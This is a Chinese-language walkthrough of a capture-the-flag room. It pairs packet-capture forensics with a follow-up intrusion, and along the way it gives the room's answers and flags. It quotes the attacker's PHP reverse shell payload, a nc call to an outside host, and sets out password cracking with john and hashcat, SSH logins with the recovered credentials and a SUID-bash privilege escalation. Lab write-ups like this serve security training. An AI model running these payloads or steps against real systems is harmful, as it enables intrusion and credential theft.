分析PCAP

他们用来上传反向shell的页面的URL是什么?

上传的话应该要涉及到http,那就过滤http协议

找到一条疑似shell的数据,追踪http流

那么URL就是/development/

攻击者使用了什么有效载荷来获得访问权限?

就是上面我划出来的那一条,reverse shell

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

攻击者使用了什么密码来保护c?

应该是连接shell之后,攻击者一系列的操作,那追踪TCP流看看,翻到第三个,追踪TCP流

可以看到一系列的操作

密码就是whenevernoteartinstant

攻击者如何建立持久性?

上面那个数据包往下翻

应该是下了一个ssh的后门文件

https://github.com/NinjaJc01/ssh-backdoor

使用快速通道单词表,有多少系统密码是可以破解的?

将数据包中的shadow文件拷到一个txt文件,用john进行爆破

pass.txt和666.txt是一个文件,当时在捣鼓john怎么再次显示爆破完成的密码233

4个

后门分析

下载上面github中的后门文件

后门的默认哈希值是多少?

在main.go文件中可以找到hash

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

后门的硬编码盐是什么?

搜索salt,发现有两个函数包含salt参数

在passwordHandler函数中找到了salt

1c362db832f3f864c8c2fe05f2002a05

攻击者使用的哈希值是多少?- 回到PCAP!

还是之前那个流量包,-a 后面的就是攻击者使用的salt

使用rockyou和您选择的破解工具破解哈希。密码是什么?

在main.go里面可以看到hash的类型是sha512

https://hashcat.net/wiki/doku.php?id=example_hashes

可以查询hash类型

将hash:salt存放在hash.txt

hashcat -m 1710 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt 

解得密码是:november16

Attack

打开网页,标题为

H4ck3d by CooctusClan

端口扫描

发现在22和2222端口都运行着ssh服务,嗯

之前看到攻击者使用James的账户来登录,于是我也试着用James的账号密码来ssh登录

发现不允许访问?

试着用2222端口

但又提示

问ChatGPT

按他说的做

ssh -oHostKeyAlgorithms=+ssh-rsa -p 2222 james@10.10.241.184

密码我一开始用的是数据包里的,发现不行,估计密码被改了,WP里用的是之前我们爆破后门文件的密码,发现可以登陆

cat user.txt

thm{d119b4fa8c497ddb0525f7ad200e6567}

然后应该是要提权,THM提示攻击者留下来什么,应该就是之前那个ssh-backdoor

发现好像又行不通。。。

再看一眼WP233,原来James的文件夹里有隐藏文件!

有一个suid_bash的二进制文件

bash命令的SUID用法

root.txt

thm{d53b2684f169360bb9606c333873144d}

碎碎念

这种溯源取证+渗透测试的房间还是挺有意思的捏,顺便复习一下之前学习的内容。然后ls看文件还是要每次加上后缀!!!